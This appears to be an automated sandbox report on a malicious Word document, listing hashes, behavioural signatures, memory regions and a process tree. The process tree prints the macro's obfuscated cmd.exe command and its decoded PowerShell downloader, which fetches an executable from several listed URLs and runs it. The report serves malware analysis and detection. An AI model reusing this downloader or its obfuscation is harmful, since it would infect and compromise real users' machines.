Overview

overview

10

Static

static

8

001b4dfcbb...18.doc

windows7-x64

10

001b4dfcbb...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25/04/2024, 21:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    001b4dfcbb02bb0ab988a7c35a3a9ff5_JaffaCakes118.doc

  • Size

    132KB

  • MD5

    001b4dfcbb02bb0ab988a7c35a3a9ff5

  • SHA1

    0d6f5812058e8145db07aeea9e669b1c66982acb

  • SHA256

    7102877d70ad54f07bdb5baa4c9a995962b6c7b93b10455b1c118a40954dcd22

  • SHA512

    a0e6404e531d102c510e0177a487fc8e914040dd69d0becfc9ef2bb74d117c998762dfa703fe90356b66b7c6ef9477967fe85f82eb9742d300ca8cd36a3c5e89

  • SSDEEP

    1536:DLh81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadnf+aSzdgY7JM8E2LxUkB:58GhDS0o9zTGOZD6EbzCd+JM8X1B

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\001b4dfcbb02bb0ab988a7c35a3a9ff5_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2584
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /V/C"set 1Rh=;'jTt'=Zwo$}}{hctac}};kaerb;'KfJ'=wqV$;nsH$ metI-ekovnI{ )00008 eg- htgnel.)nsH$ metI-teG(( fI;'SXV'=GMB$;)nsH$ ,MvR$(eliFdaolnwoD.Bkp${yrt{)WlV$ ni MvR$(hcaerof;'exe.'+PVH$+'\'+pmet:vne$=nsH$;'DAH'=cWc$;'948' = PVH$;'zaa'=jsr$;)'@'(tilpS.'l1sYnNBwe/se.sedenepoitsegoncet//:ptth@ASMYmjN/moc.tluabmarelc-engapmahc.tenartni//:ptth@wQDqEp4zB/if.notirt//:ptth@tgf3utuF/moc.aiillemac//:ptth@9A2UEUgye/moc.grenut//:ptth'=WlV$;tneilCbeW.teN tcejbo-wen=Bkp$;'uKf'=Msc$ llehsrewop&&for /L %n in (470;-1;0)do set jy=!jy!!1Rh:~%n,1!&&if %n lss 1 echo !jy:*jy!=! |powershell -"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo powershell $csM='fKu';$pkB=new-object Net.WebClient;$VlW='http://tunerg.com/eygUEU2A9@http://camelliia.com/Futu3fgt@http://triton.fi/Bz4pEqDQw@http://intranet.champagne-clerambault.com/NjmYMSA@http://tecnogestiopenedes.es/ewBNnYs1l'.Split('@');$rsj='aaz';$HVP = '849';$cWc='HAD';$Hsn=$env:temp+'\'+$HVP+'.exe';foreach($RvM in $VlW){try{$pkB.DownloadFile($RvM, $Hsn);$BMG='VXS';If ((Get-Item $Hsn).length -ge 80000) {Invoke-Item $Hsn;$Vqw='JfK';break;}}catch{}}$owZ='tTj'; "
          3⤵
            PID:2664
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -
            3⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2396
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =fKu
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2448

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
        Filesize

        20KB

        MD5

        c80d7d559b4d055762915aac358d0495

        SHA1

        90f1761855fed7442b8a98bc8417468c1ecf2605

        SHA256

        243bec00aaa7e4acbfc3c38bc963a1ab3d7192ee6bb9b457afeba776ca3131d8

        SHA512

        489ba54312d0c281e1b74969b8f79707d55592243e36e044808409481a7a78bffa1bf0922ad05dd9abca98f145e6a55c982154c73bf20b1584556f38a3da03f8

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        3ad879cc0d04cccf3a444a779f1a863d

        SHA1

        bc03bd3cfc2844f1eabc91f8de3b2e0aa6dfca10

        SHA256

        0135896431bb47bdd1f734233ac7905af4c13eeb10b9f63df9f371f1f3e50eec

        SHA512

        2bfa062a3c806e987545ebc7f513572ace1d52c1489c5c8e281b76e493d1ffaf973531dda6679272a803c98123fae6bf9c560f045e3b2ed0ef7f16178b4dff87

        Download Submit

      • memory/1500-31-0x00000000719ED000-0x00000000719F8000-memory.dmp

        Filesize

        44KB

        Download

      • memory/1500-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1500-2-0x00000000719ED000-0x00000000719F8000-memory.dmp

        Filesize

        44KB

        Download

      • memory/1500-6-0x0000000000510000-0x0000000000610000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1500-7-0x0000000000510000-0x0000000000610000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1500-8-0x0000000000510000-0x0000000000610000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/1500-48-0x00000000719ED000-0x00000000719F8000-memory.dmp

        Filesize

        44KB

        Download

      • memory/1500-47-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1500-0-0x000000002F311000-0x000000002F312000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1500-32-0x0000000000510000-0x0000000000610000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/2396-18-0x0000000002880000-0x00000000028C0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2396-30-0x000000006AAB0000-0x000000006B05B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2396-17-0x000000006AAB0000-0x000000006B05B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2396-16-0x000000006AAB0000-0x000000006B05B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2448-26-0x000000006AAB0000-0x000000006B05B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2448-25-0x000000006AAB0000-0x000000006B05B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2448-24-0x000000006AAB0000-0x000000006B05B000-memory.dmp

        Filesize

        5.7MB

        Download